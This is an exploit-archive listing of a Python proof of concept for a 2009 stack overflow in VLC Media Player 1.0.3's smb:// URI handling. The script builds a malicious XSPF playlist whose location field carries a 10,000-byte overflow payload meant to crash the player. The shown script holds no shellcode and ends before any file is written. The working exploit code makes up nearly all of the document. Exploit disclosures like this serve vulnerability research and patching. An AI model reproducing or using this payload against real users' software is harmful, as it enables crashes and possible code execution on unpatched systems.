VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC

====================================================================
VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC
====================================================================

# Title: VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr_IDE
# Published: 2009-12-06
# Verified: yes

view source
print?
#!/usr/bin/env python
 
######################################################################################################
#
# VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC
# Found By: Dr_IDE
# Tested:   Windows 7
# Download: http://www.videolan.org
# Note:     Open the .xspf file. It looks like nothing happens but close VLC you will get a crash
#
######################################################################################################
 
header1 =  ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>smb://[email protected]/foo/#{")
 
payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)
 
header2 =  ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");



#  0day.today [2018-03-02]  #